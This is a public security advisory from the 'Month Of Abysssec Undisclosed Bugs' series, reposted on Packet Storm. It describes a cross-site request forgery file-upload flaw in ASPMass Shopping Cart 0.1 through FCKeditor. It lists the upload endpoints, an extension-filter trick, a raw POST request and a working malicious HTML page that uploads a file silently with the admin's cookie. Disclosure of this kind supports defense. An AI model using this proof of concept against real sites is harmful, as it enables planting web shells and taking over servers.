Month Of Abysssec Undisclosed Bugs - ASPMass Shopping Cart suffers from a file upload cross site request forgery vulnerability.
0fa4a1fc6bc6e257ca606903b050fc285d1914f4683e5197e8247c2ea91c4a70'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub-30-aspmass-shopping-cart-vulnerability-file-upload-csrf/
'''
Abysssec Inc Public Advisory
Title : ASPMass Shopping Cart Vulnerability File Upload CSRF
Affected Version : ASPMass Shopping Cart 0.1
Discovery : www.abysssec.com
Vendor : http://www.aspmass.com/
Demo : http://www.aspmass.com/demo.htm
Admin Page : http://Example.com/Admin/Login.aspx
Description :
===========================================================================================
This version of ASP Shopping Cart has CSRF vulnerability for upload a file with fckEditor.
But we have two limitation :
1- We need Admin's Cookie
2- Specific file extension implementing by FckEditor v2 and bypassing this barrier is on you.
For example the file with this extension shell.aspx;me.xml
will be upload with this extension : shell_aspx;me.xml
you can upload your file with this paths: (of course with CSRF)
http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=File
http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=/
http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?time=1280125833981&Type=File&CurrentFolder=/
http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/test.html
http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/uploadtest.html
Uploaded files will be placing in this path:
.../Files/site/file/
.../Files/site/flash/
.../Files/site/image/
.../Files/site/media/
vulnerable Code:
The misconfiguration is in ...\Images\js\fcKeditor\editor\filemanager\connectors\aspx\config.ascx
ln 40:
private bool CheckAuthentication()
{
if (Session["AdminLogedIn"] == "Yes")
{
return true;
}
else
{
return false;
}
}
For example you can feed this POST Request to Admin :
----------------------------------------------------------------------------------------
POST http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=File&CurrentFolder=/ HTTP/1.1
Host: Example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/uploadtest.html
Cookie: ASP.NET_SessionId=ejskxhea4eqnkirsbxebj145
Content-Type: multipart/form-data; boundary=---------------------------92203111132182
Content-Length: 198
-----------------------------92203111132182
Content-Disposition: form-data; name="NewFile"; filename="Test.xml"
Content-Type: text/plain
This is a shell...
-----------------------------92203111132182--
With this POST Request, the file Test.xml uploads i this path:
.../Files/site/
The Source of HTML Page Malicious Link)
===========================================================================================
With this page, we send a request with AJAX to upload a file with Admin's Cookie.
<html>
<head>
<title >Wellcome to ASP Shopping Cart!</title>
Hello!
...
...
...
This page uploads a file with "xml" extension
<script>
var binary;
var filename;
function FileUpload() {
try {
netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
} catch (e) {
}
var http = false;
if (window.XMLHttpRequest) {
http = new XMLHttpRequest();
}
else if (window.ActiveXObject) {
http = new ActiveXObject("Microsoft.XMLHTTP");
}
var url = "http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=File&CurrentFolder=/";
var filename = 'Test.xml';
var filetext = ' This is a shell ... ';
var boundaryString = '---------------------------92203111132182';
var boundary = '--' + boundaryString;
var requestbody = boundary + '\n'
+ 'Content-Disposition: form-data; name="NewFile"; filename="'
+ filename + '"' + '\n'
+ 'Content-Type: text/plain' + '\n'
+ '\n'
+ filetext
+ '\n'
+ boundary;
http.onreadystatechange = done;
http.open('POST', url, true);
http.setRequestHeader("Content-type", "multipart/form-data; boundary=" + boundaryString);
http.setRequestHeader("Connection", "close");
http.setRequestHeader("Content-length", requestbody.length);
http.send(requestbody);
}
function done() {
if (http.readyState == 4 && http.status == 200) {
//alert(http.responseText);
//alert('Upload OK');
}
}
</script>
</head>
<body onload ="FileUpload();">
</body>
</html>
===========================================================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed